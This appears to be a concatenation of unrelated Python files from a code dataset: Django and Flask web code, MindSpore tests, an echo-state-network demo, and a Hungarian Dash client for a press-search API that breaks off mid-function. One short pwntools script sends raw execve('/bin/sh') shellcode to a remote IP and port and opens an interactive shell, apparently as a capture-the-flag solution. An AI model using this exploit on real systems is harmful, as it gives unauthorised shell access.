try:
connection.network.delete_port(port_id, ignore_missing=False)
except Exception as exc:
LOG.warning('Failed to delete neutron port %(port)s: %(exc)s',
{'port': port_id, 'exc': exc})
else:
LOG.info('Deleted port %(port)s for node %(node)s',
{'port': port_id, 'node': _utils.log_res(node)})
| 8,515 | 2,427 |
from pydantic import Field
from pystratis.api import Model
from pystratis.core.types import hexstr
# noinspection PyUnresolvedReferences
class SendTransactionRequest(Model):
"""A request model for multiple api endpoints.
Args:
transaction_hex (hexstr): The hexified transaction.
"""
transaction_hex: hexstr = Field(alias='hex')
| 355 | 100 |
from .exchange import Exchange
class ExchangeFetchFeedback(Exchange):
pass
| 81 | 22 |
from pwn import *
context.arch = 'amd64'
#io = process("./shellcode")
io = remote('34.92.37.22', 10002)
#gdb.attach(io,'handle SIGALRM nostop noprint\nb *0x4008cb\nc')
io.recvuntil(":\n")
io.sendline('\x00\x6a\x3b\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05'+'\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00')
io.interactive()
| 362 | 237 |
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.template.loader import render_to_string
from wagtail.core.blocks import ChooserBlock
from .models import Form
from .widgets import AdminFormChooser
# class FormBlock(StructBlock):
# form =
class FormChooserBlock(ChooserBlock):
@cached_property
def target_model(self):
return Form
@cached_property
def widget(self):
return AdminFormChooser
def get_context(self, value, parent_context=None):
context = super().get_context(value, parent_context=parent_context)
request = context.get('request')
if request and request.method == 'POST':
form = value.get_form(request.POST, request.FILES, page=value, user=request.user)
if form.is_valid():
value.process_form_submission(form)
messages.add_message(request, messages.SUCCESS, 'Thank you for submitting the form.')
context['redirect'] = request.path_info
form = value.get_form(page=value, user=request.user)
else:
messages.add_message(request, messages.ERROR, 'There was an error on the form, please correct it.')
else:
form = value.get_form(page=value, user=request.user)
context['form'] = form
if value.display_title:
context['form_title'] = value.title
if value.button_alignment:
context['button_alignment'] = value.button_alignment
return context
def render(self, value, context=None):
"""
Return a text rendering of 'value', suitable for display on templates. By default, this will
use a template (with the passed context, supplemented by the result of get_context) if a
'template' property is specified on the block, and fall back on render_basic otherwise.
"""
template = self.get_template(context=context, value=value)
if not template:
return self.render_basic(value, context=context)
if context is None:
new_context = self.get_context(value)
else:
new_context = self.get_context(value, parent_context=dict(context))
return mark_safe(render_to_string(template, new_context))
def get_template(self, context=None, value=None):
if not value.form_template or value.form_template == 'standard':
return getattr(self.meta, 'template', None)
return value.form_template
class Meta:
icon = "form"
template = 'customforms/blocks/form.html'
| 2,753 | 734 |
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import BaseBackend
from django.contrib.auth.hashers import check_password
from .models import OneTimePass
User = get_user_model()
# https://docs.djangoproject.com/en/3.2/topics/auth/customizing/#authentication-backends
class OneTimePassBackend(BaseBackend):
def authenticate(self, request, onetimepass_id=None, password=None):
try:
onetimepass = OneTimePass.objects.get(id=onetimepass_id)
except OneTimePass.DoesNotExist:
return None
if onetimepass.password is None or password is None:
return None
if (
check_password(password, onetimepass.password)
and onetimepass.is_alive
and not onetimepass.is_rate_limited
):
try:
user = User.objects.get(email=onetimepass.email)
except User.DoesNotExist:
user = User.objects.create_user(
username=onetimepass.email, email=onetimepass.email, password=None
)
onetimepass.delete()
return user
onetimepass.attempts += 1
onetimepass.save()
return None
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
| 1,382 | 387 |
from flask import Blueprint,render_template,flash,redirect,url_for,send_from_directory,current_app
from flask_login import current_user
from models import Student,Course
from forms.students import UploadAvatarForm,CropAvatarForm
from extensions import avatars,db
from utils import flash_errors
index_stu_bp = Blueprint('index_stu',__name__)
@index_stu_bp.route('/')
def index_stu():
return render_template('stu/student.html')
@index_stu_bp.route('/mycourse')
def course():
return render_template('stu/course.html')
@index_stu_bp.route('/myinfo')
def info():
info = Student.query.filter_by(id=current_user.id).first()
return render_template('stu/info.html',info=info)
@index_stu_bp.route('/setting')
def setting():
upload_form = UploadAvatarForm()
crop_form = CropAvatarForm()
return render_template('stu/setting.html', upload_form=upload_form, crop_form=crop_form)
@index_stu_bp.route('/setting/upload',methods=['POST'])
def upload_avatar():
form = UploadAvatarForm()
if form.validate_on_submit():
image = form.image.data
filename = avatars.save_avatar(image)
stu_pic = Student.query.filter_by(id = current_user.id).first()
stu_pic.pic = filename
#db.session.add(stu_pic)
db.session.commit()
flash('Image uploaded, please crop.', 'success')
flash_errors(form)
return redirect(url_for('.setting'))
@index_stu_bp.route('/setting/<path:filename>')
def get_avatar(filename):
return send_from_directory(current_app.config['AVATARS_SAVE_PATH'], filename)
@index_stu_bp.route('/settings/avatar/crop', methods=['POST'])
def crop_avatar():
form = CropAvatarForm()
if form.validate_on_submit():
x = form.x.data
y = form.y.data
w = form.w.data
h = form.h.data
stu_pic = Student.query.filter_by(id=current_user.id).first()
filenames = avatars.crop_avatar(stu_pic.pic, x, y, w, h)
stu_pic.pic_s = filenames[0]
stu_pic.pic_m = filenames[1]
stu_pic.pic_l = filenames[2]
#db.session.add(stu_pic)
db.session.commit()
flash('Avatar updated.', 'success')
flash_errors(form)
return redirect(url_for('.setting'))
| 2,286 | 832 |
from pkg_resources import resource_filename
import numpy as np
import matplotlib.pyplot as plt
from ..esn import ESN
from ..utils import chunk_data, standardize_traindata, scale_data
# Example using real data, one shot prediction
# Load data
fname = resource_filename('parallel_esn', 'data/PJM_Load_hourly.csv')
data = np.loadtxt(fname, delimiter=',', skiprows=1, usecols=[1])
tot_len = data.shape[0]
val_len = tot_len//10
train_len = tot_len-val_len
# Split up loaded data with 9/10ths going to training data
# and 1/10th going to validation data
train_dat = data[:train_len]
val_dat = data[train_len:]
# Standardize training data to make it more neural network-friendly
train_dat, mu, sigma = standardize_traindata(train_dat)
# Scale validatino data by mean and s.dev determined by training data
val_dat = scale_data(val_dat, mu, sigma)
windowsize = 160
trainU, trainY = chunk_data(train_dat, windowsize, 20)
valU, valY = chunk_data(val_dat, windowsize, 20)
# Create a new ESN
esn = ESN(1, windowsize, 1, 3)
loss = esn.train_validate(trainU, trainY, valU, valY)
print("validation loss = {}".format(loss))
time = np.arange(windowsize)
plt.plot(time, valU[0, 0, :], 'ob', label='input')
pred = esn.predict(valU[0, 0:1, :])
plt.plot(time+windowsize, pred[0, :], '-r', label='predicted')
plt.plot(time+windowsize, valY[0, 0, :], '^g', label='observed')
plt.title("PJM Standardized Power Consumption (One Shot)")
plt.ylabel("Arb. Units.")
plt.xlabel("Hours")
plt.legend(loc=2, numpoints=1)
plt.show()
| 1,507 | 570 |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests on mindspore.explainer.ImageClassificationRunner."""
import os
import shutil
from random import random
from unittest.mock import patch
import numpy as np
import pytest
from PIL import Image
from mindspore import context
import mindspore as ms
import mindspore.nn as nn
from mindspore.dataset import GeneratorDataset
from mindspore.explainer import ImageClassificationRunner
from mindspore.explainer._image_classification_runner import _normalize
from mindspore.explainer.benchmark import Faithfulness
from mindspore.explainer.explanation import Gradient
from mindspore.train.summary import SummaryRecord
CONST = random()
NUMDATA = 2
context.set_context(mode=context.PYNATIVE_MODE)
def image_label_bbox_generator():
for i in range(NUMDATA):
image = np.arange(i, i + 16 * 3).reshape((3, 4, 4)) / 50
label = np.array(i)
bbox = np.array([1, 1, 2, 2])
yield (image, label, bbox)
class SimpleNet(nn.Cell):
"""
Simple model for the unit test.
"""
def __init__(self):
super(SimpleNet, self).__init__()
self.reshape = ms.ops.operations.Reshape()
def construct(self, x):
prob = ms.Tensor([0.1, 0.9], ms.float32)
prob = self.reshape(prob, (1, 2))
return prob
class ActivationFn(nn.Cell):
"""
Simple activation function for unit test.
"""
def __init__(self):
super(ActivationFn, self).__init__()
def construct(self, x):
return x
def mock_gradient_call(_, inputs, targets):
return inputs[:, 0:1, :, :]
def mock_faithfulness_evaluate(_, explainer, inputs, targets, saliency):
return CONST * targets
def mock_make_rgba(array):
return array.asnumpy()
class TestRunner:
"""Test on Runner."""
def setup_method(self):
self.dataset = GeneratorDataset(image_label_bbox_generator, ["image", "label", "bbox"])
self.labels = ["label_{}".format(i) for i in range(2)]
self.network = SimpleNet()
self.summary_dir = "summary_test_temp"
self.explainer = [Gradient(self.network)]
self.activation_fn = ActivationFn()
self.benchmarkers = [Faithfulness(num_labels=len(self.labels),
metric="NaiveFaithfulness",
activation_fn=self.activation_fn)]
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_run_saliency_no_benchmark(self):
"""Test case when argument benchmarkers is not parsed."""
res = []
runner = ImageClassificationRunner(summary_dir=self.summary_dir, data=(self.dataset, self.labels),
network=self.network, activation_fn=self.activation_fn)
def mock_summary_add_value(_, plugin, name, value):
res.append((plugin, name, value))
with patch.object(SummaryRecord, "add_value", mock_summary_add_value), \
patch.object(Gradient, "__call__", mock_gradient_call):
runner.register_saliency(self.explainer)
runner.run()
# test on meta data
idx = 0
assert res[idx][0] == "explainer"
assert res[idx][1] == "metadata"
assert res[idx][2].metadata.label == self.labels
assert res[idx][2].metadata.explain_method == ["Gradient"]
# test on inference data
for i in range(NUMDATA):
idx += 1
data_np = np.arange(i, i + 3 * 16).reshape((3, 4, 4)) / 50
assert res[idx][0] == "explainer"
assert res[idx][1] == "sample"
assert res[idx][2].sample_id == i
original_path = os.path.join(self.summary_dir, res[idx][2].image_path)
with open(original_path, "rb") as f:
image_data = np.asarray(Image.open(f)) / 255.0
original_image = _normalize(np.transpose(data_np, [1, 2, 0]))
assert np.allclose(image_data, original_image, rtol=3e-2, atol=3e-2)
idx += 1
assert res[idx][0] == "explainer"
assert res[idx][1] == "inference"
assert res[idx][2].sample_id == i
assert res[idx][2].ground_truth_label == [i]
diff = np.array(res[idx][2].inference.ground_truth_prob) - np.array([[0.1, 0.9][i]])
assert np.max(np.abs(diff)) < 1e-6
assert res[idx][2].inference.predicted_label == [1]
diff = np.array(res[idx][2].inference.predicted_prob) - np.array([0.9])
assert np.max(np.abs(diff)) < 1e-6
# test on explanation data
for i in range(NUMDATA):
idx += 1
data_np = np.arange(i, i + 3 * 16).reshape((3, 4, 4)) / 50
saliency_np = data_np[0, :, :]
assert res[idx][0] == "explainer"
assert res[idx][1] == "explanation"
assert res[idx][2].sample_id == i
assert res[idx][2].explanation[0].explain_method == "Gradient"
assert res[idx][2].explanation[0].label in [i, 1]
heatmap_path = os.path.join(self.summary_dir, res[idx][2].explanation[0].heatmap_path)
assert os.path.exists(heatmap_path)
with open(heatmap_path, "rb") as f:
heatmap_data = np.asarray(Image.open(f)) / 255.0
heatmap_image = _normalize(saliency_np)
assert np.allclose(heatmap_data, heatmap_image, atol=3e-2, rtol=3e-2)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_run_saliency_with_benchmark(self):
"""Test case when argument benchmarkers is parsed."""
res = []
def mock_summary_add_value(_, plugin, name, value):
res.append((plugin, name, value))
runner = ImageClassificationRunner(summary_dir=self.summary_dir, data=(self.dataset, self.labels),
network=self.network, activation_fn=self.activation_fn)
with patch.object(SummaryRecord, "add_value", mock_summary_add_value), \
patch.object(Gradient, "__call__", mock_gradient_call), \
patch.object(Faithfulness, "evaluate", mock_faithfulness_evaluate):
runner.register_saliency(self.explainer, self.benchmarkers)
runner.run()
idx = 3 * NUMDATA + 1 # start index of benchmark data
assert res[idx][0] == "explainer"
assert res[idx][1] == "benchmark"
assert abs(res[idx][2].benchmark[0].total_score - 2 / 3 * CONST) < 1e-6
diff = np.array(res[idx][2].benchmark[0].label_score) - np.array([i * CONST for i in range(NUMDATA)])
assert np.max(np.abs(diff)) < 1e-6
def teardown_method(self):
shutil.rmtree(self.summary_dir)
| 7,522 | 2,441 |
"""
PRESSGRAPHS DASH CLIENT
WEB GUI interface for PressGraphs WebAPI
"""
###################################
# IMPORTS
###################################
#builtins
from datetime import datetime
from datetime import timedelta
#3rd party
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import dash_table as dt
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
from dash.dependencies import Input, Output, State
#oww
from md import md_txt
###################################
# DEFINITIONS
###################################
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.CERULEAN])
app.title = 'Press Graphs'
app.config.suppress_callback_exceptions = True
server = app.server
startup_time = datetime.now().strftime("%Y %m %d %H:%M")
API_KEY = "" # register your own API key at http://pressgraphs.pythonanywhere.com/create/test_user
MAX_REQUEST_DAY = 90
def build_layout():
"""
def to serve app.layout every time the app loads
"""
layout = html.Div(style={"padding":"2vw"},
children=[dcc.Location(id='url', refresh=True),
dbc.Nav([
dbc.NavItem(dbc.NavLink("kezdőlap", active=True, href="/")),
dbc.NavItem(dbc.NavLink("dátum szerint", href="/all_date")),
dbc.NavItem(dbc.NavLink("újságok szerint", href="/all_org")),
dbc.NavItem(dbc.NavLink("újság szerint", href="/site_tab")),
dbc.NavItem(dbc.NavLink("két újság összevetése", href="/site_vs_tab")),
dbc.NavItem(dbc.NavLink("két szó összevetése", href="words_tab")),
dbc.DropdownMenu(
[dbc.DropdownMenuItem("újságok", href="mo"),
dbc.DropdownMenuItem("útmutató", href ="manual"),
dbc.DropdownMenuItem("elérhetőség", href="contact")],
label="további info",
nav=True)]),
html.Hr(),
html.Div(id='page-content'),
html.Hr()])
return layout
def md_linkler(url: str) ->str:
"""
transforms url to markdown type link
"""
md_link = f"[link]({url})"
return md_link
def update_dt_by_date(dataframe: pd.DataFrame()) -> dt.DataTable():
"""
updates dash_table with passed dataframe
returns dash_table
"""
dataframe["link"] = dataframe["url"].copy()
dataframe["link"] = dataframe["link"].apply(md_linkler)
columns = [{'name': 'dátum', 'id':'date'},
{'name': 'oldal', 'id':'site'},
{'name': 'cím', 'id':'title'},
{'name': 'link', 'id':'link', 'type':'text', 'presentation': 'markdown'},
{'name': 'url', 'id':'url'}]
data = dataframe.to_dict('records')
data_table = dt.DataTable(
style_table={"padding": "50px", "maxHeight": '350px',
"overflowY": "scroll"},
style_data={'whiteSpace': 'normal', 'height': 'auto'},
style_cell={'textAlign': 'left'},
style_cell_conditional=[
{'if': {'column_id': 'date'}, 'width': '30px'},
{'if': {'column_id': 'site'}, 'width': '30px'},
{'if': {'column_id': 'title'}, 'width': '250px'},
{'if': {'column_id': 'link'}, 'width': '30px'},
{'if': {'column_id': 'url'}, 'width': '100px'}],
data=data,
columns=columns,
page_size=50,
export_format="xlsx")
return data_table
def plot_all_by_date(*, dataframe: pd.DataFrame(), search_word: str) -> px.bar:
"""
:date_count:pd.DataFrame
returns: plotly.express.px.bar
"""
if len(dataframe) > 0:
dataframe.columns = ["találatok száma"]
fig = px.bar(dataframe,
height=500,
x=dataframe.index,
y="találatok száma",
color="találatok száma",
labels={"x": "dátum", "date": "cikkek száma"},
opacity=.75,
color_continuous_scale="Geyser"
)
fig.update_layout(
title={'text': f"""A '{search_word}' szó száma a cikkek címeiben
{dataframe.index.min()}--{dataframe.index.max()}.""",
'y': 0.900,
'x': 0.50},
xaxis_title="Dátum",
yaxis_title="Cikkek száma",
yaxis_tickformat = 'd',
transition={'duration': 500},
plot_bgcolor="rgba(0,0,0,0)",
font={"family":"Courier New, monospace",
"size":11,
"color":"#000000"
})
fig.update_xaxes(showgrid=False)
fig.update_yaxes(showgrid=True, gridcolor = '#bdbdbd')
if len(dataframe) < 5:
fig.update_layout(xaxis_showticklabels = False, width=750)
fig.update_yaxes(showgrid=False, dtick=1)
return fig
return px.bar()
def plot_all_by_sites(*, dataframe: pd.DataFrame(), search_word: str):
"""
#Horizontal barchart with top n sites
"""
if len(dataframe) > 0:
df = dataframe
df.rename(columns={'title': 'darab'}, inplace=True)
fig = px.bar(df,
height=1500,
orientation='h',
x="darab",
y=df.index,
labels={"y": "orgánum", "x": "cikkek száma"},
opacity=.75,
)
fig.update_layout(
title={'text': "Találatok az elmúlt 90 napból"},
plot_bgcolor="rgba(0,0,0,0)",
yaxis_title="Újságok",
xaxis_title="Cikkek száma",
font={
"family":"Courier New, monospace",
"size":10,
"color":"#000000"
})
fig.update_traces(marker_color='black')
fig.update_xaxes(showgrid=True, gridcolor='#bdbdbd')
fig.update_yaxes(showgrid=False)
return fig
return px.bar()
def compare_two_sites(*,
search_word,
site1_df,
site2_df,
site_1,
site_2):
"""
#Comparison line chart
"""
if search_word:
search_word = str(search_word).lower()
site_corr = site1_df["count"].corr(site2_df["count"])
fig = go.Figure(
layout=go.Layout(
annotations=[go.layout.Annotation(
text=f'Korrelációs együttható (r): {site_corr:.2f}',
hovertext="""Tartomány: -1 és 1 között. Jelzi két tetszőleges érték közötti lineáris kapcsolat nagyságát és irányát.""",
borderpad=1,
bgcolor="#ffffcc",
align='left',
showarrow=False,
xref='paper',
yref='paper',
x=0,
y=1,
bordercolor='grey',
borderwidth=1)]))
fig.add_trace(go.Scatter(x=site1_df.index, y=site1_df["count"],
mode='lines',
line_shape='linear',
name=f'{site_1}'))
fig.add_trace(go.Scatter(x=site2_df.index, y=site2_df["count"],
mode='lines',
line_shape='linear',
name=f'{site_2}'))
fig.update_layout(
title=f"""'{site_1}' és '{site_2}': '{search_word}' szó száma a cikkek címeiben""",
xaxis_title="Dátum",
yaxis_title="Cikkek száma",
plot_bgcolor="rgba(0,0,0,0)",
)
fig.update_xaxes(showgrid=False)
fig.update_yaxes(showgrid=True, gridcolor='#bdbdbd')
return fig
return px.bar()
def compare_two_search_words(*,
sw_df_1,
sw_df_2,
search_word_1,
search_word_2):
"""
#TODO
"""
if search_word_1:
sw1 = search_word_1.split()[0].strip()
sw2 = search_word_2.split()[0].strip()
corr = sw_df_1["count"].corr(sw_df_2["count"])
fig = go.Figure(
layout=go.Layout(
annotations=[go.layout.Annotation(
text=f'Korrelációs együttható (r): {corr:.2f}',
hovertext="""Tartomány: -1 és 1 között.""",
borderpad=1,
bgcolor="#ffffcc",
align='left',
showarrow=False,
xref='paper',
yref='paper',
x=0,
y=1,
bordercolor='grey',
borderwidth=1)]))
fig.add_trace(go.Scatter(x=sw_df_1.index, y=sw_df_1["count"],
mode='lines',
line_shape='linear',
name=f'{sw1}'))
fig.add_trace(go.Scatter(x=sw_df_2.index, y=sw_df_2["count"],
mode='lines',
line_shape='linear',
name=f'{sw2}'))
fig.update_layout(
height=600,
title={'text': f"'{sw1}' és '{sw2}' szavak száma a cikkek címeiben",
'y':0.90,
'x':0.5},
xaxis_title="Dátum",
yaxis_title="Cikkek száma",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(
family="Courier New, monospace",
size=11,
color="#000000"
))
fig.update_xaxes(showgrid=False)
fig.update_yaxes(showgrid=True, gridcolor='#bdbdbd')
return fig
return px.bar()
###################################
# LAYOUT
###################################
print("loading layout")
app.layout = build_layout
@app.callback(
Output('page-content', 'children'),
[Input('url', 'pathname')])
def display_page(pathname):
if pathname == '/all_date':
return page_1_layout
elif pathname == '/all_org':
return page_2_layout
elif pathname == '/site_tab':
return page_3_layout
elif pathname == '/site_vs_tab':
return page_4_layout
elif pathname == '/words_tab':
return page_5_layout
elif pathname == '/contact':
return page_6_layout
elif pathname == '/manual':
return page_7_layout
elif pathname == '/mo':
return page_8_layout
else:
return index_page
###################################
# INDEX
###################################
index_page = html.Div([
dcc.Markdown(children=md_txt.index_txt)])
###################################
# PAGE 1 LAYOUT
###################################
page_1_layout = html.Div([
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input",
placeholder="keresett szó...",
type="text",
value="")), width=3)),
html.Br(),
dbc.Button("Keresés",
outline=True,
color="info",
className="mr-1",
id='submit-button',
n_clicks=0),
dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
value=[],
id="switch-input",
switch=True),
dcc.Graph(id='max_date_bargraph'),
html.Div(id="table1", style={'font-family': 'Impact'})])
###################################
# PAGE 1 CHART CALLBACK
###################################
@app.callback(Output('max_date_bargraph', 'figure'),
[Input('submit-button', 'n_clicks'),
Input('search_input', 'n_submit'),
Input('switch-input', 'value')],
[State('search_input', 'value')])
def date_count_all_site(n_clicks, n_submit, switch_value, search_word):
"""
"""
if n_clicks or n_submit:
search_word = search_word.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
site="all"
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
res_df = pd.DataFrame(content)
if len(res_df) > 0:
res_df.set_index("date", inplace=True)
else:
res_df = pd.DataFrame()
fig = plot_all_by_date(dataframe=res_df, search_word=search_word)
return fig
###################################
# PAGE 1 DATA TABLE CALLBACK
###################################
@app.callback(Output('table1', 'children'),
[Input('max_date_bargraph', 'clickData'),
Input('submit-button', 'n_clicks'),
Input('switch-input', 'value')],
[State('search_input', 'value')])
def update_table(clickData, n_clicks, switch_value, search_word):
"""
#TODO
"""
if clickData:
search_word = search_word.strip()
date = list(clickData["points"])[0]["label"]
site = "all"
if switch_value:
switch_value = 1
else:
switch_value = 0
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
df = pd.DataFrame(content)
return update_dt_by_date(df)
else:
return
###################################
# PAGE 2 LAYOUT
###################################
page_2_layout = html.Div([
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input",
placeholder="keresett szó...",
type="text",
value="")), width=3)),
html.Br(),
dbc.Button("Keresés",
outline=True,
color="info",
className="mr-1",
id='submit-button',
n_clicks=0),
dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
value=[],
id="switch-input",
switch=True),
html.Div(id='my-output'),
dcc.Graph(id='bargraph_2'),
html.Div(id="table2", style={'font-family': 'Impact'})])
###################################
# PAGE 2 CHART CALLBACK
###################################
@app.callback(Output('bargraph_2', 'figure'),
[Input('submit-button', 'n_clicks'),
Input('search_input', 'n_submit'),
Input('switch-input', 'value')],
[State('search_input', 'value')])
def update_by_site(n_clicks, n_submit, switch_value, search_word):
if n_clicks or n_submit:
search_word = search_word.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
site="all"
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
res_df = pd.DataFrame(content)
df = res_df.groupby(by="site").count()["title"]
df = pd.DataFrame(df.sort_values(ascending=True)[:])
else:
df = pd.DataFrame()
fig = plot_all_by_sites(dataframe=df, search_word=search_word)
return fig
###################################
# PAGE 2 DATA TABLE CALLBACK
###################################
@app.callback(Output('table2', 'children'),
[Input('bargraph_2', 'clickData'),
Input('submit-button', 'n_clicks'),
Input('switch-input', 'value')],
[State('search_input', 'value')])
def display_clickData_2(clickData, n_clicks, switch_value, search_word):
if clickData:
search_word = search_word.strip()
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
site = list(clickData["points"])[0]["label"]
if switch_value:
switch_value = 1
else:
switch_value = 0
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
df = pd.DataFrame(content)
return update_dt_by_date(df)
else:
return
###################################
# PAGE 3 LAYOUT
###################################
api_url = f"""http://pressgraphs.pythonanywhere.com/{API_KEY}/info/sites/all"""
response = requests.get(api_url)
schema = response.json()[0]
st_options = pd.DataFrame(response.json()[1]["data"])
page_3_layout = html.Div([
html.H5("oldal szerinti keresés"),
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input",
placeholder="keresett szó...",
type="text",
value='')), width=3)),
html.Br(),
dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
id="sites",
options=[{
'label': i,
'value': i
} for i in st_options["site"]],
placeholder="keresett oldal...",
value='')), width=3)),
html.Br(),
dbc.Button("Keresés",
outline=True,
color="info",
className="mr-1",
id='submit-button',
n_clicks=0),
dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
value=[],
id="switch-input",
switch=True),
dcc.Graph(id='bargraph_3'),
html.Div(id="table3")])
###################################
# PAGE 3 CHART CALLBACK
###################################
@app.callback(Output('bargraph_3','figure'),
[Input('submit-button', 'n_clicks'),
Input('search_input', 'n_submit'),
Input('switch-input', 'value')],
[State('search_input', 'value'),
State('sites', 'value')])
def update_site_graph(n_clicks, n_submit, switch_value, search_word, site):
"""
"""
if n_clicks or n_submit:
search_word = search_word.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
site=site
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
res_df = pd.DataFrame(content)
if len(res_df) > 0:
res_df.set_index("date",inplace=True)
else:
res_df = pd.DataFrame()
fig = plot_all_by_date(dataframe=res_df,
search_word=search_word)
return fig
###################################
# PAGE 3 DATA TABLE CALLBACK
###################################
@app.callback(Output('table3', 'children'),
[Input('bargraph_3', 'clickData'),
Input('submit-button', 'n_clicks'),
Input('switch-input', 'value')],
[State('search_input', 'value'),
State('sites', 'value')])
def display_clickData_3(clickData, n_clicks, switch_value, search_word, site):
"""
#TODO
"""
if clickData:
search_word = search_word.strip()
date = list(clickData["points"])[0]["label"]
if switch_value:
switch_value = 1
else:
switch_value = 0
api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{site}"
response = requests.get(api_url)
content = response.json()[1]["data"]
df = pd.DataFrame(content)
return update_dt_by_date(df)
else:
return
###################################
# PAGE 4 LAYOUT
###################################
api_url = f"""http://pressgraphs.pythonanywhere.com/{API_KEY}/info/sites/all"""
response = requests.get(api_url)
schema = response.json()[0]
st_options = pd.DataFrame(response.json()[1]["data"])
page_4_layout = html.Div([
html.H5("két oldal összevetése"),
dbc.Row(dbc.Col(html.Div(
dbc.Input(id="search_input",
placeholder="keresett szó...",
type="text",
value='')),width=3)),
html.Br(),
dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
id="site_1",
options=[{
'label': i,
'value': i
} for i in st_options["site"]],
placeholder="első oldal...",
value='')), width=3)),
html.Br(),
dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
id="site_2",
options=[{
'label': i,
'value': i
} for i in st_options["site"]],
placeholder="második oldal...",
value='')), width=3)),
html.Br(),
dbc.Button("Keresés",
outline=True,
color="info",
className="mr-1",
id='submit-button',
n_clicks=0),
dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
value=[],
id="switch-input",
switch=True,
),
dcc.Graph(id='graph_4'),
html.Div(id="table4")])
###################################
# PAGE 4 CAHRT CALLBACK
###################################
@app.callback(Output('graph_4','figure'),
[Input('submit-button', 'n_clicks'),
Input('search_input', 'n_submit'),
Input('switch-input', 'value')],
[State('search_input', 'value'),
State('site_1', 'value'),
State('site_2', 'value')])
def update_site_comparison(n_clicks, n_submit, switch_value, search_word, st1, st2):
"""
#TODO
"""
if n_clicks or n_submit:
search_word = search_word.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{st1}"""
response = requests.get(api_url)
s_1_content = response.json()[1]["data"]
s1_df = pd.DataFrame(s_1_content)
s1_df.set_index("date", inplace=True)
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{st2}"""
response = requests.get(api_url)
s_2_content = response.json()[1]["data"]
s2_df = pd.DataFrame(s_2_content)
s2_df.set_index("date", inplace=True)
else:
s1_df = pd.DataFrame()
s2_df = pd.DataFrame()
fig = compare_two_sites(search_word=search_word,
site1_df=s1_df,
site2_df=s2_df,
site_1=st1,
site_2=st2)
return fig
###################################
# PAGE 4 DATA TABLE CALLBACK
###################################
@app.callback(
Output('table4', 'children'),
[Input('graph_4', 'clickData'),
Input('submit-button', 'n_clicks'),
Input('switch-input', 'value')],
[State('search_input', 'value'),
State('site_1', 'value'),
State('site_2', 'value')]
)
def display_clickData_4(clickData, n_clicks, switch_value, search_word, st1, st2):
"""
#TODO
"""
if clickData:
search_word = search_word.strip()
